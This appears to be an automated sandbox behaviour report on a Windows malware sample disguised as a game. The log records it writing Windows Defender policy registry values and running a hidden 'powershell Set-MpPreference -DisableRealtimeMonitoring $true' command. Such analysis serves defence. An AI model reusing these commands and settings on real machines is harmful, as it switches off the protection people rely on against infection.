Integrity Level	Medium
Username	ZGW5TDPU\2XC7u663GxWc
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x F18 0x F1C

Threads

Thread 0xf18

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 1627-02-24 06:58:23 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 10897605	1	Fn
System	Get Time	type = Performance Ctr, time = 12065838177	1	Fn
Module	Get Handle	module_name = c:\windows\system32\sc.exe, base_address = 0xd00000	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
Service	Open Manager	database_name = SERVICES_ACTIVE_DATABASE	1	Fn
Service	Open	database_name = SERVICES_ACTIVE_DATABASE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 51	1	Fn Data

Process #14: dllhost.exe

Information	Value
ID	#14
File Name	c:\windows\system32\dllhost.exe
Command Line	C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:00:53, Reason: RPC Server
Unmonitor	End Time: 00:01:01, Reason: Self Terminated
Monitor Duration	00:00:08
Remark	No high level activity detected in monitored regions

OS Process Information

Information	Value
PID	0xf84
Parent PID	0x250 (c:\windows\system32\svchost.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	ZGW5TDPU\2XC7u663GxWc
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x FA0 0x F9C 0x F98 0x F94 0x F90 0x F8C 0x F88 0x FA4 0x FA8

Process #15: tadiapce.exe

1110

Information	Value
ID	#15
File Name	c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe
Command Line	"C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\tadiapce.exe"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:00:53, Reason: Child Process
Unmonitor	End Time: 00:01:14, Reason: Self Terminated
Monitor Duration	00:00:20

OS Process Information

Information	Value
PID	0xfac
Parent PID	0xf84 (c:\windows\system32\dllhost.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	ZGW5TDPU\2XC7u663GxWc
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x FB0 0x FB4 0x FB8 0x FBC 0x FC0 0x FCC 0x FE0

Threads

Thread 0xfb0

373

Category	Operation	Information	Count	Logfile
Module	Get Handle	module_name = c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe, base_address = 0x400000	2	Fn
Environment	Get Environment String	-	1	Fn Data
Module	Get Handle	module_name = c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe, base_address = 0x400000	1	Fn
Module	Get Address	module_name = c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe, function = ___CPPdebugHook, address_out = 0x40e13c	1	Fn
Module	Get Handle	module_name = c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe, base_address = 0x400000	1	Fn
Module	Get Address	module_name = c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe, function = ___CPPdebugHook, address_out = 0x40e13c	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetProcAddress, address_out = 0x76b633d3	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = Borland32, address_out = 0x0	1	Fn
System	Get Info	type = Operating System	1	Fn
Module	Get Filename	process_name = c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe, file_name_orig = C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\tadiapce.exe, size = 255	1	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Open	filename = STD_ERROR_HANDLE	1	Fn
File	Get Info	filename = STD_ERROR_HANDLE, type = file_type	3	Fn
Module	Get Handle	module_name = c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe, base_address = 0x400000	1	Fn
Window	Create	window_name = Squirrel Shootout by Brenton Andrew Saunders, class_name = Squirrel Shootout by Brenton Andrew Saunders, wndproc_parameter = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMLOCK, result_out = 1	1	Fn
System	Sleep	duration = 1 milliseconds (0.001 seconds)	1	Fn
System	Sleep	duration = 50 milliseconds (0.050 seconds)	1	Fn
Module	Load	module_name = Crypt32.dll, base_address = 0x75610000	1	Fn
Module	Get Address	module_name = c:\windows\system32\crypt32.dll, function = CryptStringToBinaryA, address_out = 0x75645d77	1	Fn
Module	Load	module_name = Crypt32.dll, base_address = 0x75610000	1	Fn
Module	Get Address	module_name = c:\windows\system32\crypt32.dll, function = CryptStringToBinaryA, address_out = 0x75645d77	1	Fn
Module	Load	module_name = Crypt32.dll, base_address = 0x75610000	1	Fn
Module	Get Address	module_name = c:\windows\system32\crypt32.dll, function = CryptStringToBinaryA, address_out = 0x75645d77	1	Fn
Module	Load	module_name = Crypt32.dll, base_address = 0x75610000	1	Fn
Module	Get Address	module_name = c:\windows\system32\crypt32.dll, function = CryptStringToBinaryA, address_out = 0x75645d77	1	Fn
Module	Load	module_name = kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Load	module_name = advapi32.dll, base_address = 0x774c0000	1	Fn
Module	Load	module_name = shell32.dll, base_address = 0x75bb0000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = Wow64EnableWow64FsRedirection, address_out = 0x76b98bc9	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegCloseKey, address_out = 0x774d469d	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegCreateKeyW, address_out = 0x774d1514	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegOpenKeyExW, address_out = 0x774d468d	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegSetValueExW, address_out = 0x774d14d6	1	Fn
Module	Get Address	module_name = c:\windows\system32\shell32.dll, function = ShellExecuteA, address_out = 0x75df7078	1	Fn
Process	Create	process_name = cmd, show_window = SW_HIDE	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMLOCK, result_out = 1	1	Fn
Keyboard	Read	virtual_key_code = VK_LEFT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_RIGHT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_SPACE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_RETURN, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMPAD4, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMPAD6, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ADD, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_SUBTRACT, result_out = 0	1	Fn
System	Get Time	type = Ticks, time = 10904204	249	Fn
Keyboard	Read	virtual_key_code = VK_NUMLOCK, result_out = 1	1	Fn
Keyboard	Read	virtual_key_code = VK_LEFT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_RIGHT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_SPACE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_RETURN, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMPAD4, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMPAD6, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ADD, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_SUBTRACT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMLOCK, result_out = 1	3	Fn
Keyboard	Read	virtual_key_code = VK_LEFT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_RIGHT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_SPACE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_RETURN, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMPAD4, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMPAD6, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ADD, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_SUBTRACT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMLOCK, result_out = 1	4	Fn
Keyboard	Read	virtual_key_code = VK_LEFT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_RIGHT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_SPACE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_RETURN, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMPAD4, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMPAD6, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ADD, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_SUBTRACT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMLOCK, result_out = 1	4	Fn
Keyboard	Read	virtual_key_code = VK_LEFT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_RIGHT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_SPACE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_RETURN, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMPAD4, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMPAD6, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ADD, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_SUBTRACT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMLOCK, result_out = 1	4	Fn
Keyboard	Read	virtual_key_code = VK_LEFT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_RIGHT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_SPACE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_RETURN, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMPAD4, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMPAD6, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ADD, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_SUBTRACT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMLOCK, result_out = 1	4	Fn
Process	Create	process_name = cmd, show_window = SW_HIDE	1	Fn
Keyboard	Read	virtual_key_code = VK_LEFT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_RIGHT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_SPACE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_RETURN, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMPAD4, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMPAD6, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ADD, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_SUBTRACT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMLOCK, result_out = 1	1	Fn
Keyboard	Read	virtual_key_code = VK_LEFT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_RIGHT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_SPACE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_RETURN, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMPAD4, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMPAD6, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ADD, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_SUBTRACT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMLOCK, result_out = 1	2	Fn
Process	Create	process_name = cmd, show_window = SW_HIDE	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMLOCK, result_out = 1	1	Fn
Keyboard	Read	virtual_key_code = VK_LEFT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_RIGHT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_SPACE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_RETURN, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMPAD4, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMPAD6, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ADD, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_SUBTRACT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMLOCK, result_out = 1	4	Fn
Keyboard	Read	virtual_key_code = VK_LEFT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_RIGHT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_SPACE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_RETURN, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMPAD4, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMPAD6, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ADD, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_SUBTRACT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMLOCK, result_out = 1	4	Fn
Keyboard	Read	virtual_key_code = VK_LEFT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_RIGHT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_SPACE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_RETURN, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMPAD4, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMPAD6, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ADD, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_SUBTRACT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMLOCK, result_out = 1	4	Fn
Keyboard	Read	virtual_key_code = VK_LEFT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_RIGHT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_SPACE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_RETURN, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMPAD4, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMPAD6, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ADD, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_SUBTRACT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMLOCK, result_out = 1	4	Fn
Keyboard	Read	virtual_key_code = VK_LEFT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_RIGHT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_SPACE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_RETURN, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMPAD4, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMPAD6, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ADD, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_SUBTRACT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMLOCK, result_out = 1	4	Fn
Keyboard	Read	virtual_key_code = VK_LEFT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_RIGHT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_SPACE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_RETURN, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMPAD4, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMPAD6, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ADD, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_SUBTRACT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMLOCK, result_out = 1	4	Fn
Keyboard	Read	virtual_key_code = VK_LEFT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_RIGHT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_SPACE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_RETURN, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMPAD4, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMPAD6, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ADD, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_SUBTRACT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMLOCK, result_out = 1	4	Fn
Keyboard	Read	virtual_key_code = VK_LEFT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_RIGHT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_SPACE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_RETURN, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMPAD4, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMPAD6, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ADD, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_SUBTRACT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMLOCK, result_out = 1	2	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender, value_name = DisableAntiSpyware, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection, value_name = DisableBehaviorMonitoring, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection, value_name = DisableOnAccessProtection, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection, value_name = DisableOnRealtimeEnable, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection, value_name = DisableIOAVProtection, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
System	Sleep	duration = 3 milliseconds (0.003 seconds)	1	Fn
Module	Load	module_name = advapi32.dll, base_address = 0x774c0000	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = CryptAcquireContextA, address_out = 0x774c91dd	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = CryptImportKey, address_out = 0x774cc532	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = CryptEncrypt, address_out = 0x774e779b	1	Fn
Module	Load	module_name = kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Load	module_name = ntdll.dll, base_address = 0x77330000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = VirtualAlloc, address_out = 0x76b62fb6	1	Fn
Module	Get Address	module_name = c:\windows\system32\ntdll.dll, function = memcpy, address_out = 0x77364cc0	1	Fn
Module	Load	module_name = KERNEL32.dll, base_address = 0x0	1	Fn
System	Sleep	duration = 1 milliseconds (0.001 seconds)	255	Fn
System	Get Info	type = System Directory, result_out = C:\Windows\system32	1	Fn
Service	Open Manager	database_name = SERVICES_ACTIVE_DATABASE	1	Fn
Service	Open	database_name = SERVICES_ACTIVE_DATABASE	1	Fn
Service	Open Manager	database_name = SERVICES_ACTIVE_DATABASE	1	Fn
Service	Open	database_name = SERVICES_ACTIVE_DATABASE	1	Fn
Service	Open Manager	database_name = SERVICES_ACTIVE_DATABASE	1	Fn
Service	Open	database_name = SERVICES_ACTIVE_DATABASE	1	Fn
System	Get Info	type = Hardware Information	1	Fn
Module	Get Filename	module_name = KERNEL32.dll, process_name = c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe, file_name_orig = C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\tadiapce.exe, size = 260	1	Fn
Process	Get Info	type = PROCESS_BASIC_INFORMATION	1	Fn
Module	Load	module_name = SHLWAPI.dll, base_address = 0x0	1	Fn
Module	Load	module_name = CRYPT32.dll, base_address = 0x0	1	Fn
Module	Load	module_name = bcrypt.dll, base_address = 0x0	1	Fn
Module	Load	module_name = USER32.dll, base_address = 0x0	1	Fn
Module	Load	module_name = WINHTTP.dll, base_address = 0x0	1	Fn
Module	Load	module_name = WS2_32.dll, base_address = 0x0	1	Fn
Module	Load	module_name = OLEAUT32.dll, base_address = 0x0	1	Fn
Module	Load	module_name = USERENV.dll, base_address = 0x0	1	Fn
Module	Load	module_name = ncrypt.dll, base_address = 0x0	1	Fn
Module	Load	module_name = ADVAPI32.dll, base_address = 0x0	1	Fn
Module	Load	module_name = IPHLPAPI.DLL, base_address = 0x0	1	Fn
Module	Load	module_name = SHELL32.dll, base_address = 0x0	1	Fn
System	Sleep	duration = 1 milliseconds (0.001 seconds)	320	Fn
Module	Get Filename	module_name = SHELL32.dll, process_name = c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe, file_name_orig = C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\tadiapce.exe, size = 512	1	Fn
System	Sleep	duration = 1 milliseconds (0.001 seconds)	2	Fn
Module	Get Filename	module_name = SHELL32.dll, process_name = c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe, file_name_orig = C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\tadiapce.exe, size = 260	1	Fn
System	Get Info	type = Windows Directory, result_out = C:\Windows	1	Fn
Mutex	Create	mutex_name = Global\C850A606981932960	1	Fn
System	Get Info	type = Operating System	1	Fn
COM	Create	interface = 2FABA4C7-4DA9-4013-9697-20CC3FD40F85, cls_context = CLSCTX_INPROC_SERVER	1	Fn
System	Get Time	type = Local Time, time = 2019-05-14 15:31:23 (Local Time)	1	Fn

Process #16: cmd.exe

Information	Value
ID	#16
File Name	c:\windows\system32\cmd.exe
Command Line	"C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:00:54, Reason: Child Process
Unmonitor	End Time: 00:01:06, Reason: Self Terminated
Monitor Duration	00:00:11

OS Process Information

Information	Value
PID	0xfc4
Parent PID	0xfac (c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	ZGW5TDPU\2XC7u663GxWc
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x FC8

Threads

Thread 0xfc8

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 1627-02-24 06:58:31 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 10905281	1	Fn
System	Get Time	type = Performance Ctr, time = 12932478875	1	Fn
Module	Get Handle	module_name = c:\windows\system32\cmd.exe, base_address = 0x4a830000	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x76b624c2	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	3	Fn
File	Open	filename = STD_INPUT_HANDLE	2	Fn
Environment	Get Environment String	-	2	Fn Data
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 104, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE	1	Fn
Module	Get Filename	process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 260	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PROMPT	1	Fn
Environment	Set Environment String	name = PROMPT, value = $P$G	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Environment	Get Environment String	name = KEYS	1	Fn
File	Get Info	filename = C:\Windows\system32, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32, type = file_attributes	1	Fn
Environment	Set Environment String	name = =C:, value = C:\Windows\System32	1	Fn
Environment	Get Environment String	-	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x76b4ac6c	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x76b53ea8	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x76b62732	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Process	Create	process_name = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, os_pid = 0x81c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL	1	Fn
Environment	Set Environment String	name = COPYCMD	1	Fn
Environment	Get Environment String	-	1	Fn Data
